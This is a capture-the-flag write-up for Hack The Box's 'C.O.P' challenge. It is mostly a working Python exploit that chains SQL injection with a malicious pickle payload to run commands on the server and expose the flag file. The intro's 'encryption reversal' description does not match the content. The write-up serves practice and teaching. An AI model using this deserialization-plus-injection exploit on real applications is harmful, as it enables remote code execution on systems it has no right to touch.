HackTheBox C.O.P Challenge

Explore the basics of cybersecurity in the C.O.P Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/395

Description#

The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!

Exploitation#

#!/usr/bin/python3
import requests,pickle,base64,sys,os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

class RCE:
    def __reduce__(self):
        return (os.system, (payload_command,))

def create_malicious_pickle():
    malicious_object = RCE()
    pickled_payload = pickle.dumps(malicious_object)
    encoded_payload = base64.urlsafe_b64encode(pickled_payload).decode('ascii')
    return encoded_payload

def inject_payload(encoded_payload):
    injection_url = f"{TARGET_URL}1' UNION SELECT '{encoded_payload}'-- "
    response = requests.get(injection_url)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print("Server response:", response.text)

def check_flag_file():
    response = requests.get(STATIC_FILE_URL)
    if response.status_code == 200:
        print("[+] Flag file accessed successfully!")
        print(response.text, end='')
    else:
        print("[-] Could not access the flag file. The exploit may not have worked.")

BASE_URL = get_base_url()
TARGET_URL = f"{BASE_URL}/view/"
STATIC_FILE_URL = f"{BASE_URL}/static/flag.txt"
payload_command = 'cp /app/flag.txt /app/application/static/flag.txt'

if __name__ == "__main__":
    encoded_payload = create_malicious_pickle()
    print(f"[+] Generated payload: {encoded_payload}")
    inject_payload(encoded_payload)
    check_flag_file()

Summary#

C.O.P is an easy-level challenge on Hack The Box that combines insecure deserialization and SQL injection to achieve remote code execution (RCE). A malicious Python object is serialized using pickle and encoded in Base64. The payload is injected via an SQLi vulnerability in the view endpoint, executing a command to copy the flag file to a publicly accessible directory. The flag is then retrieved from the static directory, highlighting the risks of insecure deserialization and improper input sanitization in web applications.